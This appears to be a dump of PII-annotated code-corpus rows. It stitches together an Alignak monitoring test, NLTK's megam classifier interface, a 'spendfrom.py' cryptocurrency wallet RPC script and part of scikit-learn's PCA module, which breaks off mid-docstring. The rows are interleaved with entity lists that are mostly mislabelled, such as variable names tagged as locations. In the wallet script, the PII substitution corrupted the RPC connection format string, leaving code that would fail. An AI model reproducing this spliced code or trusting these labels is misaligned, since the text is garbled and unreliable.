| 7,053 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Matthieu Perrot'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'np.asarray(y'], ['PERSON', "%s'"], ['LOCATION', 'n_samples'], ['PERSON', 'means.append(meang'], ['LOCATION', 'Vt ='], ['NRP', 'V.T'], ['LOCATION', 'Vt'], ['LOCATION', 'rotations.append(Vt'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['NRP', 'gaussian'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['URL', 'email.com'], ['URL', 'np.ar'], ['URL', 'np.ar'], ['URL', 'clf.fi'], ['URL', 'clf.pr'], ['URL', 'self.pr'], ['URL', 'np.as'], ['URL', 'self.co'], ['URL', 'np.as'], ['URL', 'np.as'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'X.sh'], ['URL', 'y.sh'], ['URL', 'y.dtype.ch'], ['URL', 'ndimage.me'], ['URL', 'np.bi'], ['URL', 'y.as'], ['URL', 'np.int'], ['URL', 'X.sh'], ['URL', 'classes.si'], ['URL', 'self.pr'], ['URL', 'np.ar'], ['URL', 'ndimage.measurements.su'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'self.pr'], ['URL', 'Xg.me'], ['URL', 'np.linalg.sv'], ['URL', 'np.su'], ['URL', 'np.do'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.as'], ['URL', 'self.sc'], ['URL', 'np.as'], ['URL', 'self.ro'], ['URL', 'self.cl'], ['URL', 'np.as'], ['URL', 'self.cl'], ['URL', 'self.ro'], ['URL', 'self.sc'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.su'], ['URL', 'np.ar'], ['URL', 'np.su'], ['URL', 'self.sc'], ['URL', 'self.pr'], ['URL', 'self.de'], ['URL', 'self.cl'], ['URL', 'd.ar'], ['URL', 'self.de'], ['URL', 'np.ne'], ['URL', 'likelihood.su'], ['URL', 'np.ne'], ['URL', 'self.pr']] |
82 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2015: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
#
#
# This file incorporates work covered by the following copyright and
# permission notice:
#
# Copyright (C) 2009-2014:
# Jean Gabes, dummy@email.com
# Hartmut Goebel, dummy@email.com
# Grégory Starck, dummy@email.com
# Zoran Zaric, dummy@email.com
# Sebastien Coavoux, dummy@email.com
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
#
# This file is used to test reading and processing of config files
#
from alignak_test import *
class TestConfig(AlignakTest):
def setUp(self):
self.setup_with_file('etc/alignak_resultmodulation.cfg')
def get_svc(self):
return self.sched.services.find_srv_by_name_and_hostname("test_host_0", "test_ok_0")
def get_host(self):
return self.sched.hosts.find_by_name("test_host_0")
def get_router(self):
return self.sched.hosts.find_by_name("test_router_0")
def test_service_resultmodulation(self):
svc = self.get_svc()
host = self.get_host()
router = self.get_router()
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0'],])
self.assertEqual('UP', host.state)
self.assertEqual('HARD', host.state_type)
# This service got a result modulation. So Criticals are in fact
# Warnings. So even with some CRITICAL (2), it must be warning
self.assertEqual('WARNING', svc.state)
        # If we remove the resultmodulations, we should have the classic behavior
svc.resultmodulations = []
self.scheduler_loop(2, [[host, 0, 'UP | value1=1 value2=2'], [svc, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('CRITICAL', svc.state)
        # Now look for the inherited thing
        # resultmodulation is an implicit inherited parameter
        # and router defines it, but not test_router_0/test_ok_0. So this service should also be impacted
svc2 = self.sched.services.find_srv_by_name_and_hostname("test_router_0", "test_ok_0")
self.assertEqual(router.resultmodulations, svc2.resultmodulations)
self.scheduler_loop(2, [[svc2, 2, 'BAD | value1=0 value2=0']])
self.assertEqual('WARNING', svc2.state)
if __name__ == '__main__':
unittest.main()
| 3,666 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2015'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['LOCATION', 'Alignak'], ['DATE_TIME', '2009-2014'], ['PERSON', 'Jean Gabes'], ['PERSON', 'Hartmut Goebel'], ['PERSON', 'Grégory Starck'], ['PERSON', 'Zoran Zaric'], ['PERSON', 'Sebastien Coavoux'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'Shinken'], ['PERSON', 'test_service_resultmodulation(self'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'self.se'], ['URL', 'resultmodulation.cf'], ['URL', 'self.sched.services.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.sched.hosts.fi'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'host.st'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'svc.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc.st'], ['URL', 'self.sched.services.fi'], ['URL', 'self.as'], ['URL', 'router.re'], ['URL', 'svc2.re'], ['URL', 'self.sc'], ['URL', 'self.as'], ['URL', 'svc2.st'], ['URL', 'unittest.ma']] |
83 | # Natural Language Toolkit: Interface to Megam Classifier
#
# Copyright (C) 2001-2010 NLTK Project
# Author: Edward Loper dummy@email.com
# URL: <http://www.nltk.org/>
# For license information, see LICENSE.TXT
#
# $Id: naivebayes.py 2063 2004-07-17 21:02:24Z edloper $
"""
A set of functions used to interface with the external U{megam
<http://www.cs.utah.edu/~hal/megam/>} maxent optimization package.
Before C{megam} can be used, you should tell NLTK where it can find
the C{megam} binary, using the L{config_megam()} function. Typical
usage:
>>> import nltk
>>> nltk.config_megam('.../path/to/megam')
>>> classifier = nltk.MaxentClassifier.train(corpus, 'megam')
"""
__docformat__ = 'epytext en'
import os
import os.path
import subprocess
from nltk.internals import find_binary
try:
import numpy
except ImportError:
numpy = None
######################################################################
#{ Configuration
######################################################################
_megam_bin = None
def config_megam(bin=None):
"""
Configure NLTK's interface to the C{megam} maxent optimization
package.
@param bin: The full path to the C{megam} binary. If not specified,
then nltk will search the system for a C{megam} binary; and if
one is not found, it will raise a C{LookupError} exception.
@type bin: C{string}
"""
global _megam_bin
_megam_bin = find_binary(
'megam', bin,
env_vars=['MEGAM', 'MEGAMHOME'],
binary_names=['megam.opt', 'megam', 'megam_686', 'megam_i686.opt'],
url='http://www.cs.utah.edu/~hal/megam/')
######################################################################
#{ Megam Interface Functions
######################################################################
def write_megam_file(train_toks, encoding, stream,
bernoulli=True, explicit=True):
"""
Generate an input file for C{megam} based on the given corpus of
classified tokens.
@type train_toks: C{list} of C{tuples} of (C{dict}, C{str})
@param train_toks: Training data, represented as a list of
pairs, the first member of which is a feature dictionary,
and the second of which is a classification label.
@type encoding: L{MaxentFeatureEncodingI}
@param encoding: A feature encoding, used to convert featuresets
into feature vectors.
@type stream: C{stream}
@param stream: The stream to which the megam input file should be
written.
@param bernoulli: If true, then use the 'bernoulli' format. I.e.,
all joint features have binary values, and are listed iff they
are true. Otherwise, list feature values explicitly. If
C{bernoulli=False}, then you must call C{megam} with the
C{-fvals} option.
@param explicit: If true, then use the 'explicit' format. I.e.,
list the features that would fire for any of the possible
labels, for each token. If C{explicit=True}, then you must
call C{megam} with the C{-explicit} option.
"""
# Look up the set of labels.
labels = encoding.labels()
labelnum = dict([(label, i) for (i, label) in enumerate(labels)])
# Write the file, which contains one line per instance.
for featureset, label in train_toks:
# First, the instance number.
stream.write('%d' % labelnum[label])
# For implicit file formats, just list the features that fire
# for this instance's actual label.
if not explicit:
_write_megam_features(encoding.encode(featureset, label),
stream, bernoulli)
# For explicit formats, list the features that would fire for
# any of the possible labels.
else:
for l in labels:
stream.write(' #')
_write_megam_features(encoding.encode(featureset, l),
stream, bernoulli)
        # End of the instance.
stream.write('\n')
def parse_megam_weights(s, features_count, explicit=True):
"""
Given the stdout output generated by C{megam} when training a
model, return a C{numpy} array containing the corresponding weight
vector. This function does not currently handle bias features.
"""
if numpy is None:
raise ValueError('This function requires that numpy be installed')
assert explicit, 'non-explicit not supported yet'
lines = s.strip().split('\n')
weights = numpy.zeros(features_count, 'd')
for line in lines:
if line.strip():
fid, weight = line.split()
weights[int(fid)] = float(weight)
return weights
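# Example (added illustration): each stdout line is "<feature id> <weight>",
# and unlisted features keep weight zero, so
#   parse_megam_weights('0 1.5\n3 -0.25\n', 4)
# returns array([ 1.5 ,  0.  ,  0.  , -0.25]).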
def _write_megam_features(vector, stream, bernoulli):
if not vector:
raise ValueError('MEGAM classifier requires the use of an '
'always-on feature.')
for (fid, fval) in vector:
if bernoulli:
if fval == 1:
stream.write(' %s' % fid)
elif fval != 0:
raise ValueError('If bernoulli=True, then all'
'features must be binary.')
else:
stream.write(' %s %s' % (fid, fval))
def call_megam(args):
"""
Call the C{megam} binary with the given arguments.
"""
if isinstance(args, basestring):
raise TypeError('args should be a list of strings')
if _megam_bin is None:
config_megam()
# Call megam via a subprocess
cmd = [_megam_bin] + args
p = subprocess.Popen(cmd, stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
# Check the return code.
if p.returncode != 0:
print
print stderr
raise OSError('megam command failed!')
return stdout
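if __name__ == '__main__':
    # Demonstration (added, illustrative only; assumes NLTK is installed):
    # write a tiny training file in megam's explicit/bernoulli format to
    # stdout. _StubEncoding is a hypothetical stand-in for a real
    # MaxentFeatureEncodingI implementation.
    import sys
    class _StubEncoding(object):
        def labels(self):
            return ['pos', 'neg']
        def encode(self, featureset, label):
            # feature 0 is always-on; remaining ids are assigned per key
            fids = [(0, 1)]
            for n, fname in enumerate(sorted(featureset)):
                if featureset[fname]:
                    fids.append((n + 1, 1))
            return fids
    toks = [({'shiny': True}, 'pos'), ({'dull': True}, 'neg')]
    write_megam_file(toks, _StubEncoding(), sys.stdout)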
| 5,800 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', 'http://www.nltk.org/'], ['DATE_TIME', '2001-2010'], ['PERSON', 'Edward Loper'], ['DATE_TIME', '2063 2004-07-17'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['LOCATION', 'megam_bin'], ['PERSON', 'bin'], ['PERSON', 'megam_i686.opt'], ['PERSON', 'bernoulli=True'], ['LOCATION', 'C{tuples'], ['PERSON', 'bernoulli'], ['PERSON', 'labelnum'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['PERSON', 'bernoulli'], ['LOCATION', 'fid'], ['LOCATION', 'fid'], ['LOCATION', 'megam_bin'], ['URL', 'http://www.cs.utah.edu/~hal/megam/'], ['URL', "http://www.cs.utah.edu/~hal/megam/'"], ['URL', 'email.com'], ['URL', 'naivebayes.py'], ['URL', 'nltk.co'], ['URL', 'nltk.MaxentClassifier.tr'], ['URL', 'os.pa'], ['URL', 'nltk.int'], ['URL', 'encoding.la'], ['URL', 's.st'], ['URL', 'line.st'], ['URL', 'p.com'], ['URL', 'p.re']] |
84 | #!/usr/bin/env python
#
# Use the raw transactions API to spend ones received on particular addresses,
# and send any change back to that same address.
#
# Example usage:
# spendfrom.py # Lists available funds
# spendfrom.py --from=ADDRESS --to=ADDRESS --amount=11.00
#
# Assumes it will talk to a oned or One-Qt running
# on localhost.
#
# Depends on jsonrpc
#
from decimal import *
import getpass
import math
import os
import os.path
import platform
import sys
import time
from jsonrpc import ServiceProxy, json
BASE_FEE=Decimal("0.001")
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n)))*1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def determine_db_dir():
"""Return the default location of the One Core data directory"""
if platform.system() == "Darwin":
return os.path.expanduser("~/Library/Application Support/OneCore/")
elif platform.system() == "Windows":
return os.path.join(os.environ['APPDATA'], "OneCore")
return os.path.expanduser("~/.onecore")
def read_bitcoin_config(dbdir):
"""Read the one.conf file from dbdir, returns dictionary of settings"""
from ConfigParser import SafeConfigParser
class FakeSecHead(object):
def __init__(self, fp):
self.fp = fp
self.sechead = '[all]\n'
def readline(self):
if self.sechead:
try: return self.sechead
finally: self.sechead = None
else:
s = self.fp.readline()
if s.find('#') != -1:
s = s[0:s.find('#')].strip() +"\n"
return s
config_parser = SafeConfigParser()
config_parser.readfp(FakeSecHead(open(os.path.join(dbdir, "one.conf"))))
return dict(config_parser.items("all"))
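# Example (added note): for a one.conf containing
#   rpcuser=alice
#   rpcpassword=s3cret # trailing comments are stripped by FakeSecHead
# read_bitcoin_config returns {'rpcuser': 'alice', 'rpcpassword': 's3cret'}
# (values here are hypothetical).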
def connect_JSON(config):
"""Connect to a One Core JSON-RPC server"""
testnet = config.get('testnet', '0')
testnet = (int(testnet) > 0) # 0/1 in config file, convert to True/False
if not 'rpcport' in config:
config['rpcport'] = 19998 if testnet else 9876
connect = "http://%s:dummy@email.com:%s"%(config['rpcuser'], config['rpcpassword'], config['rpcport'])
try:
result = ServiceProxy(connect)
# ServiceProxy is lazy-connect, so send an RPC command mostly to catch connection errors,
# but also make sure the oned we're talking to is/isn't testnet:
if result.getmininginfo()['testnet'] != testnet:
sys.stderr.write("RPC server at "+connect+" testnet setting mismatch\n")
sys.exit(1)
return result
except:
sys.stderr.write("Error connecting to RPC server at "+connect+"\n")
sys.exit(1)
def unlock_wallet(oned):
info = oned.getinfo()
if 'unlocked_until' not in info:
return True # wallet is not encrypted
t = int(info['unlocked_until'])
if t <= time.time():
try:
passphrase = getpass.getpass("Wallet is locked; enter passphrase: ")
oned.walletpassphrase(passphrase, 5)
except:
sys.stderr.write("Wrong passphrase\n")
info = oned.getinfo()
return int(info['unlocked_until']) > time.time()
def list_available(oned):
address_summary = dict()
address_to_account = dict()
for info in oned.listreceivedbyaddress(0):
address_to_account[info["address"]] = info["account"]
unspent = oned.listunspent(0)
for output in unspent:
# listunspent doesn't give addresses, so:
rawtx = oned.getrawtransaction(output['txid'], 1)
vout = rawtx["vout"][output['vout']]
pk = vout["scriptPubKey"]
# This code only deals with ordinary pay-to-one-address
# or pay-to-script-hash outputs right now; anything exotic is ignored.
if pk["type"] != "pubkeyhash" and pk["type"] != "scripthash":
continue
address = pk["addresses"][0]
if address in address_summary:
address_summary[address]["total"] += vout["value"]
address_summary[address]["outputs"].append(output)
else:
address_summary[address] = {
"total" : vout["value"],
"outputs" : [output],
"account" : address_to_account.get(address, "")
}
return address_summary
def select_coins(needed, inputs):
# Feel free to improve this, this is good enough for my simple needs:
outputs = []
have = Decimal("0.0")
n = 0
while have < needed and n < len(inputs):
outputs.append({ "txid":inputs[n]["txid"], "vout":inputs[n]["vout"]})
have += inputs[n]["amount"]
n += 1
return (outputs, have-needed)
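# Illustration (added note): selection is greedy in list order, e.g. with
#   inputs = [{"txid": "aa", "vout": 0, "amount": Decimal("0.4")},
#             {"txid": "bb", "vout": 1, "amount": Decimal("0.8")}]
# select_coins(Decimal("1.0"), inputs) consumes both outputs and reports
# change of Decimal("0.2").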
def create_tx(oned, fromaddresses, toaddress, amount, fee):
all_coins = list_available(oned)
total_available = Decimal("0.0")
needed = amount+fee
potential_inputs = []
for addr in fromaddresses:
if addr not in all_coins:
continue
potential_inputs.extend(all_coins[addr]["outputs"])
total_available += all_coins[addr]["total"]
if total_available < needed:
sys.stderr.write("Error, only %f BTC available, need %f\n"%(total_available, needed));
sys.exit(1)
#
# Note:
# Python's json/jsonrpc modules have inconsistent support for Decimal numbers.
# Instead of wrestling with getting json.dumps() (used by jsonrpc) to encode
# Decimals, I'm casting amounts to float before sending them to oned.
#
outputs = { toaddress : float(amount) }
(inputs, change_amount) = select_coins(needed, potential_inputs)
if change_amount > BASE_FEE: # don't bother with zero or tiny change
change_address = fromaddresses[-1]
if change_address in outputs:
outputs[change_address] += float(change_amount)
else:
outputs[change_address] = float(change_amount)
rawtx = oned.createrawtransaction(inputs, outputs)
signed_rawtx = oned.signrawtransaction(rawtx)
if not signed_rawtx["complete"]:
sys.stderr.write("signrawtransaction failed\n")
sys.exit(1)
txdata = signed_rawtx["hex"]
return txdata
def compute_amount_in(oned, txinfo):
result = Decimal("0.0")
for vin in txinfo['vin']:
in_info = oned.getrawtransaction(vin['txid'], 1)
vout = in_info['vout'][vin['vout']]
result = result + vout['value']
return result
def compute_amount_out(txinfo):
result = Decimal("0.0")
for vout in txinfo['vout']:
result = result + vout['value']
return result
def sanity_test_fee(oned, txdata_hex, max_fee):
class FeeError(RuntimeError):
pass
try:
txinfo = oned.decoderawtransaction(txdata_hex)
total_in = compute_amount_in(oned, txinfo)
total_out = compute_amount_out(txinfo)
if total_in-total_out > max_fee:
raise FeeError("Rejecting transaction, unreasonable fee of "+str(total_in-total_out))
tx_size = len(txdata_hex)/2
kb = tx_size/1000 # integer division rounds down
if kb > 1 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee transaction, larger than 1000 bytes")
if total_in < 0.01 and fee < BASE_FEE:
raise FeeError("Rejecting no-fee, tiny-amount transaction")
# Exercise for the reader: compute transaction priority, and
# warn if this is a very-low-priority transaction
except FeeError as err:
sys.stderr.write((str(err)+"\n"))
sys.exit(1)
def main():
import optparse
parser = optparse.OptionParser(usage="%prog [options]")
parser.add_option("--from", dest="fromaddresses", default=None,
help="addresses to get ones from")
parser.add_option("--to", dest="to", default=None,
help="address to get send ones to")
parser.add_option("--amount", dest="amount", default=None,
help="amount to send")
parser.add_option("--fee", dest="fee", default="0.0",
help="fee to include")
parser.add_option("--datadir", dest="datadir", default=determine_db_dir(),
help="location of one.conf file with RPC username/password (default: %default)")
parser.add_option("--testnet", dest="testnet", default=False, action="store_true",
help="Use the test network")
parser.add_option("--dry_run", dest="dry_run", default=False, action="store_true",
help="Don't broadcast the transaction, just create and print the transaction data")
(options, args) = parser.parse_args()
check_json_precision()
config = read_bitcoin_config(options.datadir)
if options.testnet: config['testnet'] = True
oned = connect_JSON(config)
if options.amount is None:
address_summary = list_available(oned)
for address,info in address_summary.iteritems():
n_transactions = len(info['outputs'])
if n_transactions > 1:
print("%s %.8f %s (%d transactions)"%(address, info['total'], info['account'], n_transactions))
else:
print("%s %.8f %s"%(address, info['total'], info['account']))
else:
fee = Decimal(options.fee)
amount = Decimal(options.amount)
while unlock_wallet(oned) == False:
pass # Keep asking for passphrase until they get it right
txdata = create_tx(oned, options.fromaddresses.split(","), options.to, amount, fee)
sanity_test_fee(oned, txdata, amount*Decimal("0.01"))
if options.dry_run:
print(txdata)
else:
txid = oned.sendrawtransaction(txdata)
print(txid)
if __name__ == '__main__':
main()
| 9,912 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['NRP', 'spendfrom.py'], ['NRP', 'spendfrom.py'], ['LOCATION', 'jsonrpc'], ['LOCATION', 'json'], ['PERSON', 'json'], ['PERSON', 'platform.system'], ['PERSON', 'Darwin'], ['PERSON', 'config_parser = SafeConfigParser'], ['NRP', 'address_to_account'], ['LOCATION', 'fromaddresses'], ['PERSON', 'fromaddresses'], ['NRP', 'float(amount'], ['PERSON', 'FeeError("Rejecting'], ['PERSON', 'FeeError("Rejecting'], ['PERSON', 'FeeError("Rejecting'], ['PERSON', 'one.conf'], ['PERSON', 'txdata = create_tx(oned'], ['PERSON', 'options.fromaddresses.split'], ['URL', 'spendfrom.py'], ['URL', 'spendfrom.py'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.pa'], ['URL', 'platform.sy'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'one.co'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.se'], ['URL', 'self.fp.re'], ['URL', 's.fi'], ['URL', 's.fi'], ['URL', 'parser.re'], ['URL', 'os.path.jo'], ['URL', 'one.co'], ['URL', 'parser.it'], ['URL', 'config.ge'], ['URL', 'email.com'], ['URL', 'result.ge'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'getpass.ge'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.li'], ['URL', 'oned.li'], ['URL', 'oned.ge'], ['URL', 'account.ge'], ['URL', 'sys.st'], ['URL', 'oned.cr'], ['URL', 'oned.si'], ['URL', 'sys.st'], ['URL', 'oned.ge'], ['URL', 'oned.de'], ['URL', 'sys.st'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'one.co'], ['URL', 'parser.ad'], ['URL', 'parser.ad'], ['URL', 'parser.pa'], ['URL', 'options.am'], ['URL', 'summary.it'], ['URL', 'options.am'], ['URL', 'options.fr'], ['URL', 'options.to'], ['URL', 'oned.se']] |
85 | """ Principal Component Analysis
"""
# Author: Alexandre Gramfort dummy@email.com
# Olivier Grisel dummy@email.com
# Mathieu Blondel dummy@email.com
# Denis A. Engemann dummy@email.com
#
# License: BSD 3 clause
from math import log, sqrt
import warnings
import numpy as np
from scipy import linalg
from scipy.special import gammaln
from ..base import BaseEstimator, TransformerMixin
from ..utils import array2d, check_random_state, as_float_array
from ..utils import atleast2d_or_csr
from ..utils.extmath import fast_logdet, safe_sparse_dot, randomized_svd, \
fast_dot
def _assess_dimension_(spectrum, rank, n_samples, n_features):
"""Compute the likelihood of a rank ``rank`` dataset
    The dataset is assumed to be embedded in gaussian noise of shape (n,
dimf) having spectrum ``spectrum``.
Parameters
----------
spectrum: array of shape (n)
data spectrum
rank: int,
tested rank value
n_samples: int,
number of samples
dim: int,
embedding/empirical dimension
Returns
-------
ll: float,
The log-likelihood
Notes
-----
This implements the method of `Thomas P. Minka:
Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`
"""
if rank > len(spectrum):
raise ValueError("The tested rank cannot exceed the rank of the"
" dataset")
pu = -rank * log(2.)
for i in range(rank):
pu += (gammaln((n_features - i) / 2.)
- log(np.pi) * (n_features - i) / 2.)
pl = np.sum(np.log(spectrum[:rank]))
pl = -pl * n_samples / 2.
if rank == n_features:
pv = 0
v = 1
else:
v = np.sum(spectrum[rank:]) / (n_features - rank)
pv = -np.log(v) * n_samples * (n_features - rank) / 2.
m = n_features * rank - rank * (rank + 1.) / 2.
pp = log(2. * np.pi) * (m + rank + 1.) / 2.
pa = 0.
spectrum_ = spectrum.copy()
spectrum_[rank:n_features] = v
for i in range(rank):
for j in range(i + 1, len(spectrum)):
pa += log((spectrum[i] - spectrum[j]) *
(1. / spectrum_[j] - 1. / spectrum_[i])) + log(n_samples)
ll = pu + pl + pv + pp - pa / 2. - rank * log(n_samples) / 2.
return ll
def _infer_dimension_(spectrum, n_samples, n_features):
"""Infers the dimension of a dataset of shape (n_samples, n_features)
The dataset is described by its spectrum `spectrum`.
"""
n_spectrum = len(spectrum)
ll = np.empty(n_spectrum)
for rank in range(n_spectrum):
ll[rank] = _assess_dimension_(spectrum, rank, n_samples, n_features)
return ll.argmax()
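# Usage sketch (added illustration): given the spectrum of a centred data
# matrix -- computed exactly as in PCA._fit below -- Minka's criterion
# selects the rank with the highest log-likelihood:
#   _, S, _ = linalg.svd(X - X.mean(axis=0), full_matrices=False)
#   k = _infer_dimension_((S ** 2) / n_samples, n_samples, n_features)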
class PCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA)
Linear dimensionality reduction using Singular Value Decomposition of the
data and keeping only the most significant singular vectors to project the
data to a lower dimensional space.
This implementation uses the scipy.linalg implementation of the singular
value decomposition. It only works for dense arrays and is not scalable to
large dimensional data.
The time complexity of this implementation is ``O(n ** 3)`` assuming
n ~ n_samples ~ n_features.
Parameters
----------
n_components : int, None or string
Number of components to keep.
if n_components is not set all components are kept::
n_components == min(n_samples, n_features)
if n_components == 'mle', Minka\'s MLE is used to guess the dimension
if ``0 < n_components < 1``, select the number of components such that
the amount of variance that needs to be explained is greater than the
percentage specified by n_components
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
whiten : bool, optional
When True (False by default) the `components_` vectors are divided
by n_samples times singular values to ensure uncorrelated outputs
with unit component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
        making their data respect some hard-wired assumptions.
Attributes
----------
`components_` : array, [n_components, n_features]
Components with maximum variance.
`explained_variance_ratio_` : array, [n_components]
        Percentage of variance explained by each of the selected components. \
        If k is not set then all components are stored and the sum of explained \
        variances is equal to 1.0
`n_components_` : int
The estimated number of components. Relevant when n_components is set
to 'mle' or a number between 0 and 1 to select using explained
variance.
Notes
-----
For n_components='mle', this class uses the method of `Thomas P. Minka:
Automatic Choice of Dimensionality for PCA. NIPS 2000: 598-604`
Due to implementation subtleties of the Singular Value Decomposition (SVD),
which is used in this implementation, running fit twice on the same matrix
can lead to principal components with signs flipped (change in direction).
For this reason, it is important to always use the same estimator object to
transform data in a consistent fashion.
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import PCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = PCA(n_components=2)
>>> pca.fit(X)
PCA(copy=True, n_components=2, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
See also
--------
ProbabilisticPCA
RandomizedPCA
KernelPCA
SparsePCA
TruncatedSVD
"""
def __init__(self, n_components=None, copy=True, whiten=False):
self.n_components = n_components
self.copy = copy
self.whiten = whiten
def fit(self, X, y=None):
"""Fit the model with X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
self._fit(X)
return self
def fit_transform(self, X, y=None):
"""Fit the model with X and apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
Training data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
U, S, V = self._fit(X)
U = U[:, :self.n_components_]
if self.whiten:
# X_new = X * V / S * sqrt(n_samples) = U * sqrt(n_samples)
U *= sqrt(X.shape[0])
else:
# X_new = X * V = U * S * V^T * V = U * S
U *= S[:self.n_components_]
return U
def _fit(self, X):
""" Fit the model on X
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
Returns
-------
U, s, V : ndarrays
The SVD of the input data, copied and centered when
requested.
"""
X = array2d(X)
n_samples, n_features = X.shape
X = as_float_array(X, copy=self.copy)
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
U, S, V = linalg.svd(X, full_matrices=False)
self.explained_variance_ = (S ** 2) / n_samples
self.explained_variance_ratio_ = (self.explained_variance_ /
self.explained_variance_.sum())
if self.whiten:
self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)
else:
self.components_ = V
n_components = self.n_components
if n_components is None:
n_components = n_features
elif n_components == 'mle':
if n_samples < n_features:
raise ValueError("n_components='mle' is only supported "
"if n_samples >= n_features")
n_components = _infer_dimension_(self.explained_variance_,
n_samples, n_features)
if 0 < n_components < 1.0:
# number of components for which the cumulated explained variance
# percentage is superior to the desired threshold
ratio_cumsum = self.explained_variance_ratio_.cumsum()
n_components = np.sum(ratio_cumsum < n_components) + 1
self.components_ = self.components_[:n_components, :]
self.explained_variance_ = \
self.explained_variance_[:n_components]
self.explained_variance_ratio_ = \
self.explained_variance_ratio_[:n_components]
self.n_components_ = n_components
return (U, S, V)
def transform(self, X):
"""Apply the dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples is the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
X = array2d(X)
if self.mean_ is not None:
X = X - self.mean_
X_transformed = fast_dot(X, self.components_.T)
return X_transformed
def inverse_transform(self, X):
"""Transform data back to its original space, i.e.,
return an input X_original whose transform would be X
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples is the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
